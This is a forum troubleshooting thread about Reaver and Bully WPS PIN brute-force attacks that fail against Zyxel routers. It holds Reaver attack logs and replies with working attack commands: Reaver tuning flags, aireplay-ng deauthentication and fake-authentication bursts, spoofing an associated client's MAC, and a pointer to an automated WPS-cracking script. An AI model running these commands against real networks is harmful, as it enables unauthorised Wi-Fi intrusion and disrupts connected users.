i am using kali Linux 1.1.0 and reaver 1.5 and Bully (Latest Git). the problem is Reaver is not working with most of the Zyxel brand Routers, WPS is enabled. i tried reaver and bully on my Friends Router and i get nothing just " WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null)" and after sometime when it successfully associate then i get EAPOL warning and sometime "WPS transaction Error" . interesting thing is i tried this reaver on three Zyxel routers , Same result and also these all Routers Manufacturing date is 2009-2010 (When WPS flaw is not Gone Public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx Brands. So someone explain me why this not working with these Brands?? And also Help me to resolve this issue . (See the below Output and Link for my bully output and WPS settings Screen Shot)..

http://i.imgur.com/NngbBZ7.png
http://i.imgur.com/uSdk9wE.png


reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:3E:61:9C:80:xx
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m8s.
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m15s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
^C
[+] Nothing done, nothing to save.

Thanks in Advance.. :)

Any Solution ?? :/

There's such thing as a firmware update... Probably only set to WPS PBC.

Never Updated the Firmware and also AUto Firmware Updating is Not Supported Too....
And also i Think WPS is Not Only SET to PBC.. :/
(Please See ScreenSHot)..
http://i.imgur.com/NngbBZ7.png

Could also be that the AP only acts as the registrar in the exchange and reaver also tries to be the registrar. You can't have 2 registrars. Try pressing "Add external registrar" and see if that works.

Tried " Add External Resgistrar" Same issue, and also When i restart/Rebot My Router or it Restart because of power failure , Both Pin Sections become Blank ......

Try , -S -N -L -E -d 1 -r 9:61 options..

best options for zyxel modems...

Try , -S -N -L -E -d 1 -r 9:61 options..

best options for zyxel modems...

Tried Every Combination , Same issue ... :(

Umm... I think zyxel modem crushed after bruteforce...

Use airodump-ng and listen it... open wireshark and read message ..

Beacons , probe respons...

İf you see so much block messages .. Changce your mac adress ( macchanger)

İf you see so much error -failed message .. Probably, modem crushed..!

Umm... I think zyxel modem crushed after bruteforce...

Use airodump-ng and listen it... open wireshark and read message ..

Beacons , probe respons...

İf you see so much block messages .. Changce your mac adress ( macchanger)

İf you see so much error -failed message .. Probably, modem crushed..!

Here is the Wireshark Output . Please See this....

http://www.fileconvoy.com/dfl.php?id=g9f6779f7d4b2682999965488453c452c189a6e 471

Not every Access point is vulnerable. At this time only 2 1/2 chipsets are vulnerable to even the pixiewps attack, which u don't seem to be using.

The wps pin attack which you appear to be using requires much more time.

[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
[!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)

When I've come across the error above, two things helped me.
1. getting physically closer to target router, or try (-t20 <<< increase the receive timeout time)
2. use a spoof client mac address and let aireplay-ng handle keeping association with router

reaver options
-A another program handles association
--mac=00:11:00:11:00:11
-t20


Use the forked version of reaver. (https://github.com/t6x/reaver-wps-fork-t6x) by t6x that has pixiewps built in.

Once you run the reaver linked above, report back the chipset.

To FurqanHanif

MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.

hi Furqanhanif,

I saw your cap file... ... Target AP not answer your request.. There is no probe respons or any information about modem...

Modem is unusable....

try other APs ..

Good luck ...

To FurqanHanif

MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.

WPS Lock is Not The Problem (WPS is Unlocked i checked from Wash) , This script also not working....

Please see the wireshark Cap File and Check.....

hi Furqanhanif,

I saw your cap file... ... Target AP not answer your request.. There is no probe respons or any information about modem...

Modem is unusable....

try other APs ..

Good luck ...

But Why Target AP is Not Replying ??? WPS is Enabled (i Checked from wash). and only this type of AP causing Problem..

But Why Target AP is Not Replying ??? WPS is Enabled (i Checked from wash). and only this type of AP causing Problem..

I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

Like in your post.. :)

Try this , and you will see that Anybody connect AP... Because Unusable...



Airodump-ng mon0 -c X -b XX:XX:XX:XX:XX:XX

I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

Like in your post.. :)

Try this , and you will see that Anybody connect AP... Because Unusable...



Airodump-ng mon0 -c X -b XX:XX:XX:XX:XX:XX

Broken Modem ?? i don't get it. i am able to connect to the router and it's working fine, but only Reaver Not Working Against it even When WPS is Enabled. Why.. ? Still Unclear.

To: FurquanHanif

The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

See if the router will respond to aireplay-ng

Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

Leave it running

Open a terminal window

reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

Set the correct channel and mac address

Open another terminal window

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Leave it running

Now Hit the router with some deauths

Open a third terminal window

aireplay-ng -0 10 -a xx:xx:xx:xx:xx mon0

Hit the router a few times with short deauth bursts

Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

These are simple methods. More advance techniques require automated scripts.

MTeams

İf Modem is working fine... Try this..

First , connect AP like a normal user... (visit web sites) (for traffic)
Later, try to find your password with different device ..

Reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

You can receive M1 "probe response" message ( all information about modem )

No Traffic = No probe response = Failed to associate with target AP...

Or you can try this...

sometimes ( I don t know why?) İf I shake or turn my wireless adapter , reaver is running to test ...suddenly...

turn your wireless adapter .. shake on air....

To: FurquanHanif

The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

See if the router will respond to aireplay-ng

Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

Leave it running

Open a terminal window

reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

Set the correct channel and mac address

Open another terminal window

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Leave it running

Now Hit the router with some deauths

Open a third terminal window

aireplay-ng -0 10 -a xx:xx:xx:xx:xx mon0

Hit the router a few times with short deauth bursts

Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

These are simple methods. More advance techniques require automated scripts.

MTeams


Tried Your Commands , No Luck . Stuck on Sending Identity Response..
See this Cap File.
http://www.fileconvoy.com/dfl.php?id=g08c1f8ae7f5519db9996584220c37fbe9b342a dad

İf Modem is working fine... Try this..

First , connect AP like a normal user... (visit web sites) (for traffic)
Later, try to find your password with different device ..

Reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

You can receive M1 "probe response" message ( all information about modem )

No Traffic = No probe response = Failed to associate with target AP...

Or you can try this...

sometimes ( I don t know why?) İf I shake or turn my wireless adapter , reaver is running to test ...suddenly...

turn your wireless adapter .. shake on air....

Connect To AP and then Try Reaver , Same issue , No M1 , M2 etccc .... :(

MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

MTeams

MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

MTeams
This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tuff routers is to let aireplay-ng handle the association.
Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

Use the -h option also in aireplay-ng, same as spoofed client mac.
Aireplay-ng .....standard options.......-h (spoofed client mac)

Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely an new issue.

This is good to know. I'm running a Zyxel PK5001Z router from my ISP and I'm having this same issue. I'll try the recommendations in this thread and report back.

This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tuff routers is to let aireplay-ng handle the association.
Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

Use the -h option also in aireplay-ng, same as spoofed client mac.
Aireplay-ng .....standard options.......-h (spoofed client mac)

Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely an new issue.

i tried everything including MAC Spoofing stuff , No Luck ... :/

MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

MTeams

Tried , Not working..

Modem crush or wps ia inactive...

Try your luck with Zyxel Utility ... İf you have it....